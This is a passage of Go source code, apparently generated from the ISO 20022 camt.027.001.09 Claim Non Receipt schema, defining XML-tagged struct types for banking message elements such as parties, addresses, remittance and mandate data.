Tp CreditorReferenceType2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Ref Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Ref,omitempty"`
}
type CreditorReferenceType1Choice struct {
Cd DocumentType3Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type CreditorReferenceType2 struct {
CdOrPrtry CreditorReferenceType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdOrPrtry"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type DateAndDateTime2Choice struct {
Dt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dt,omitempty"`
DtTm ISODateTime `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DtTm,omitempty"`
}
type DateAndPlaceOfBirth1 struct {
BirthDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 BirthDt"`
PrvcOfBirth Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PrvcOfBirth,omitempty"`
CityOfBirth Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CityOfBirth"`
CtryOfBirth CountryCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtryOfBirth"`
}
type DatePeriod2 struct {
FrDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FrDt"`
ToDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ToDt"`
}
type DiscountAmountAndType1 struct {
Tp DiscountAmountType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Amt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt"`
}
type DiscountAmountType1Choice struct {
Cd ExternalDiscountAmountType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type Document struct {
ClmNonRct ClaimNonReceiptV09 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ClmNonRct"`
}
type DocumentAdjustment1 struct {
Amt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt"`
CdtDbtInd CreditDebitCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtDbtInd,omitempty"`
Rsn Max4Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rsn,omitempty"`
AddtlInf Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AddtlInf,omitempty"`
}
type DocumentLineIdentification1 struct {
Tp DocumentLineType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Nb Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nb,omitempty"`
RltdDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RltdDt,omitempty"`
}
type DocumentLineInformation1 struct {
Id []DocumentLineIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
Desc Max2048Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Desc,omitempty"`
Amt RemittanceAmount3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt,omitempty"`
}
type DocumentLineType1 struct {
CdOrPrtry DocumentLineType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdOrPrtry"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type DocumentLineType1Choice struct {
Cd ExternalDocumentLineType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
// May be one of RADM, RPIN, FXDR, DISP, PUOR, SCOR
type DocumentType3Code string
// May be one of MSIN, CNFA, DNFA, CINV, CREN, DEBN, HIRI, SBIN, CMCN, SOAC, DISP, BOLD, VCHR, AROI, TSUT, PUOR
type DocumentType6Code string
type EquivalentAmount2 struct {
Amt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt"`
CcyOfTrf ActiveOrHistoricCurrencyCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CcyOfTrf"`
}
// Must match the pattern [0-9]{2}
type Exact2NumericText string
// Must match the pattern [a-zA-Z0-9]{4}
type Exact4AlphaNumericText string
// May be no more than 4 items long
type ExternalAccountIdentification1Code string
// May be no more than 4 items long
type ExternalAgentInstruction1Code string
// May be no more than 4 items long
type ExternalCashAccountType1Code string
// May be no more than 3 items long
type ExternalCashClearingSystem1Code string
// May be no more than 4 items long
type ExternalCategoryPurpose1Code string
// May be no more than 5 items long
type ExternalClearingSystemIdentification1Code string
// May be no more than 4 items long
type ExternalDiscountAmountType1Code string
// May be no more than 4 items long
type ExternalDocumentLineType1Code string
// May be no more than 4 items long
type ExternalFinancialInstitutionIdentification1Code string
// May be no more than 4 items long
type ExternalGarnishmentType1Code string
// May be no more than 35 items long
type ExternalLocalInstrument1Code string
// May be no more than 4 items long
type ExternalMandateSetupReason1Code string
// May be no more than 4 items long
type ExternalOrganisationIdentification1Code string
// May be no more than 4 items long
type ExternalPersonIdentification1Code string
// May be no more than 4 items long
type ExternalProxyAccountType1Code string
// May be no more than 4 items long
type ExternalPurpose1Code string
// May be no more than 4 items long
type ExternalServiceLevel1Code string
// May be no more than 4 items long
type ExternalTaxAmountType1Code string
type FinancialIdentificationSchemeName1Choice struct {
Cd ExternalFinancialInstitutionIdentification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type FinancialInstitutionIdentification18 struct {
BICFI BICFIDec2014Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 BICFI,omitempty"`
ClrSysMmbId ClearingSystemMemberIdentification2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ClrSysMmbId,omitempty"`
LEI LEIIdentifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LEI,omitempty"`
Nm Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
PstlAdr PostalAddress24 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PstlAdr,omitempty"`
Othr GenericFinancialIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Othr,omitempty"`
}
type Frequency36Choice struct {
Tp Frequency6Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Prd FrequencyPeriod1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prd,omitempty"`
PtInTm FrequencyAndMoment1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PtInTm,omitempty"`
}
// May be one of YEAR, MNTH, QURT, MIAN, WEEK, DAIL, ADHO, INDA, FRTN
type Frequency6Code string
type FrequencyAndMoment1 struct {
Tp Frequency6Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp"`
PtInTm Exact2NumericText `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PtInTm"`
}
type FrequencyPeriod1 struct {
Tp Frequency6Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp"`
CntPerPrd float64 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CntPerPrd"`
}
type Garnishment3 struct {
Tp GarnishmentType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp"`
Grnshee PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Grnshee,omitempty"`
GrnshmtAdmstr PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 GrnshmtAdmstr,omitempty"`
RefNb Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RefNb,omitempty"`
Dt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dt,omitempty"`
RmtdAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RmtdAmt,omitempty"`
FmlyMdclInsrncInd bool `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FmlyMdclInsrncInd,omitempty"`
MplyeeTermntnInd bool `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MplyeeTermntnInd,omitempty"`
}
type GarnishmentType1 struct {
CdOrPrtry GarnishmentType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdOrPrtry"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type GarnishmentType1Choice struct {
Cd ExternalGarnishmentType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type GenericAccountIdentification1 struct {
Id Max34Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
SchmeNm AccountSchemeName1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SchmeNm,omitempty"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type GenericFinancialIdentification1 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
SchmeNm FinancialIdentificationSchemeName1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SchmeNm,omitempty"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type GenericIdentification30 struct {
Id Exact4AlphaNumericText `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr"`
SchmeNm Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SchmeNm,omitempty"`
}
type GenericOrganisationIdentification1 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
SchmeNm OrganisationIdentificationSchemeName1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SchmeNm,omitempty"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type GenericPersonIdentification1 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
SchmeNm PersonIdentificationSchemeName1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SchmeNm,omitempty"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
// Must match the pattern [A-Z]{2,2}[0-9]{2,2}[a-zA-Z0-9]{1,30}
type IBAN2007Identifier string
type ISODate time.Time
func (t *ISODate) UnmarshalText(text []byte) error {
return (*xsdDate)(t).UnmarshalText(text)
}
func (t ISODate) MarshalText() ([]byte, error) {
return xsdDate(t).MarshalText()
}
type ISODateTime time.Time
func (t *ISODateTime) UnmarshalText(text []byte) error {
return (*xsdDateTime)(t).UnmarshalText(text)
}
func (t ISODateTime) MarshalText() ([]byte, error) {
return xsdDateTime(t).MarshalText()
}
type ISOYear time.Time
func (t *ISOYear) UnmarshalText(text []byte) error {
return (*xsdGYear)(t).UnmarshalText(text)
}
func (t ISOYear) MarshalText() ([]byte, error) {
return xsdGYear(t).MarshalText()
}
type InstructionForAssignee1 struct {
Cd ExternalAgentInstruction1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
InstrInf Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstrInf,omitempty"`
}
// Must match the pattern [A-Z0-9]{18,18}[0-9]{2,2}
type LEIIdentifier string
type LocalInstrument2Choice struct {
Cd ExternalLocalInstrument1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type MandateClassification1Choice struct {
Cd MandateClassification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
// May be one of FIXE, USGB, VARI
type MandateClassification1Code string
type MandateRelatedData2Choice struct {
DrctDbtMndt MandateRelatedInformation15 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DrctDbtMndt,omitempty"`
CdtTrfMndt CreditTransferMandateData1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtTrfMndt,omitempty"`
}
type MandateRelatedInformation15 struct {
MndtId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MndtId,omitempty"`
DtOfSgntr ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DtOfSgntr,omitempty"`
AmdmntInd bool `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AmdmntInd,omitempty"`
AmdmntInfDtls AmendmentInformationDetails14 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AmdmntInfDtls,omitempty"`
ElctrncSgntr Max1025Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ElctrncSgntr,omitempty"`
FrstColltnDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FrstColltnDt,omitempty"`
FnlColltnDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FnlColltnDt,omitempty"`
Frqcy Frequency36Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Frqcy,omitempty"`
Rsn MandateSetupReason1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rsn,omitempty"`
TrckgDays Exact2NumericText `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TrckgDays,omitempty"`
}
type MandateSetupReason1Choice struct {
Cd ExternalMandateSetupReason1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type MandateTypeInformation2 struct {
SvcLvl ServiceLevel8Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SvcLvl,omitempty"`
LclInstrm LocalInstrument2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LclInstrm,omitempty"`
CtgyPurp CategoryPurpose1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtgyPurp,omitempty"`
Clssfctn MandateClassification1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Clssfctn,omitempty"`
}
// May be no more than 1025 items long
type Max1025Text string
type Max10KBinary []byte
func (t *Max10KBinary) UnmarshalText(text []byte) error {
return (*xsdBase64Binary)(t).UnmarshalText(text)
}
func (t Max10KBinary) MarshalText() ([]byte, error) {
return xsdBase64Binary(t).MarshalText()
}
// May be no more than 128 items long
type Max128Text string
// May be no more than 140 items long
type Max140Text string
// May be no more than 16 items long
type Max16Text string
// May be no more than 2048 items long
type Max2048Text string
// May be no more than 34 items long
type Max34Text string
// May be no more than 350 items long
type Max350Text string
// May be no more than 35 items long
type Max35Text string
// May be no more than 4 items long
type Max4Text string
// May be no more than 70 items long
type Max70Text string
type MissingCover5 struct {
MssngCoverInd bool `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MssngCoverInd"`
CoverCrrctn SettlementInstruction13 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CoverCrrctn,omitempty"`
}
// May be one of DOCT, MADM, MISS, MIST, MIKS
type NamePrefix2Code string
type OrganisationIdentification29 struct {
AnyBIC AnyBICDec2014Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AnyBIC,omitempty"`
LEI LEIIdentifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LEI,omitempty"`
Othr []GenericOrganisationIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Othr,omitempty"`
}
type OrganisationIdentificationSchemeName1Choice struct {
Cd ExternalOrganisationIdentification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type OriginalGroupInformation29 struct {
OrgnlMsgId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMsgId"`
OrgnlMsgNmId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMsgNmId"`
OrgnlCreDtTm ISODateTime `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlCreDtTm,omitempty"`
}
type OriginalTransactionReference35 struct {
IntrBkSttlmAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 IntrBkSttlmAmt,omitempty"`
Amt AmountType4Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt,omitempty"`
IntrBkSttlmDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 IntrBkSttlmDt,omitempty"`
ReqdColltnDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ReqdColltnDt,omitempty"`
ReqdExctnDt DateAndDateTime2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ReqdExctnDt,omitempty"`
CdtrSchmeId PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtrSchmeId,omitempty"`
SttlmInf SettlementInstruction11 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SttlmInf,omitempty"`
PmtTpInf PaymentTypeInformation27 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PmtTpInf,omitempty"`
PmtMtd PaymentMethod4Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PmtMtd,omitempty"`
MndtRltdInf MandateRelatedData2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MndtRltdInf,omitempty"`
RmtInf RemittanceInformation21 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RmtInf,omitempty"`
UltmtDbtr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 UltmtDbtr,omitempty"`
Dbtr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dbtr,omitempty"`
DbtrAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DbtrAcct,omitempty"`
DbtrAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DbtrAgt,omitempty"`
DbtrAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DbtrAgtAcct,omitempty"`
CdtrAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtrAgt,omitempty"`
CdtrAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtrAgtAcct,omitempty"`
Cdtr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cdtr,omitempty"`
CdtrAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtrAcct,omitempty"`
UltmtCdtr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 UltmtCdtr,omitempty"`
Purp Purpose2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Purp,omitempty"`
}
type OtherContact1 struct {
ChanlTp Max4Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ChanlTp"`
Id Max128Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id,omitempty"`
}
type Party38Choice struct {
OrgId OrganisationIdentification29 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgId,omitempty"`
PrvtId PersonIdentification13 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PrvtId,omitempty"`
}
type Party40Choice struct {
Pty PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Pty,omitempty"`
Agt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Agt,omitempty"`
}
type PartyIdentification135 struct {
Nm Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
PstlAdr PostalAddress24 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PstlAdr,omitempty"`
Id Party38Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id,omitempty"`
CtryOfRes CountryCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtryOfRes,omitempty"`
CtctDtls Contact4 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtctDtls,omitempty"`
}
// May be one of CHK, TRF, DD, TRA
type PaymentMethod4Code string
type PaymentTypeInformation27 struct {
InstrPrty Priority2Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstrPrty,omitempty"`
ClrChanl ClearingChannel2Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ClrChanl,omitempty"`
SvcLvl []ServiceLevel8Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SvcLvl,omitempty"`
LclInstrm LocalInstrument2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LclInstrm,omitempty"`
SeqTp SequenceType3Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SeqTp,omitempty"`
CtgyPurp CategoryPurpose1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtgyPurp,omitempty"`
}
type PersonIdentification13 struct {
DtAndPlcOfBirth DateAndPlaceOfBirth1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DtAndPlcOfBirth,omitempty"`
Othr []GenericPersonIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Othr,omitempty"`
}
type PersonIdentificationSchemeName1Choice struct {
Cd ExternalPersonIdentification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
// Must match the pattern \+[0-9]{1,3}-[0-9()+\-]{1,30}
type PhoneNumber string
type PostalAddress24 struct {
AdrTp AddressType3Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AdrTp,omitempty"`
Dept Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dept,omitempty"`
SubDept Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SubDept,omitempty"`
StrtNm Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 StrtNm,omitempty"`
BldgNb Max16Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 BldgNb,omitempty"`
BldgNm Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 BldgNm,omitempty"`
Flr Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Flr,omitempty"`
PstBx Max16Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PstBx,omitempty"`
Room Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Room,omitempty"`
PstCd Max16Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PstCd,omitempty"`
TwnNm Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TwnNm,omitempty"`
TwnLctnNm Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TwnLctnNm,omitempty"`
DstrctNm Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DstrctNm,omitempty"`
CtrySubDvsn Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtrySubDvsn,omitempty"`
Ctry CountryCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Ctry,omitempty"`
AdrLine []Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AdrLine,omitempty"`
}
// May be one of LETT, MAIL, PHON, FAXX, CELL
type PreferredContactMethod1Code string
// May be one of HIGH, NORM
type Priority2Code string
type ProxyAccountIdentification1 struct {
Tp ProxyAccountType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Id Max2048Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
}
type ProxyAccountType1Choice struct {
Cd ExternalProxyAccountType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type Purpose2Choice struct {
Cd ExternalPurpose1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ReferredDocumentInformation7 struct {
Tp ReferredDocumentType4 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Nb Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nb,omitempty"`
RltdDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RltdDt,omitempty"`
LineDtls []DocumentLineInformation1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LineDtls,omitempty"`
}
type ReferredDocumentType3Choice struct {
Cd DocumentType6Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ReferredDocumentType4 struct {
CdOrPrtry ReferredDocumentType3Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdOrPrtry"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type RemittanceAmount2 struct {
DuePyblAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DuePyblAmt,omitempty"`
DscntApldAmt []DiscountAmountAndType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DscntApldAmt,omitempty"`
CdtNoteAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtNoteAmt,omitempty"`
TaxAmt []TaxAmountAndType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxAmt,omitempty"`
AdjstmntAmtAndRsn []DocumentAdjustment1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AdjstmntAmtAndRsn,omitempty"`
RmtdAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RmtdAmt,omitempty"`
}
type RemittanceAmount3 struct {
DuePyblAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DuePyblAmt,omitempty"`
DscntApldAmt []DiscountAmountAndType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DscntApldAmt,omitempty"`
CdtNoteAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtNoteAmt,omitempty"`
TaxAmt []TaxAmountAndType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxAmt,omitempty"`
AdjstmntAmtAndRsn []DocumentAdjustment1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AdjstmntAmtAndRsn,omitempty"`
RmtdAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RmtdAmt,omitempty"`
}
type RemittanceInformation21 struct {
Ustrd []Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Ustrd,omitempty"`
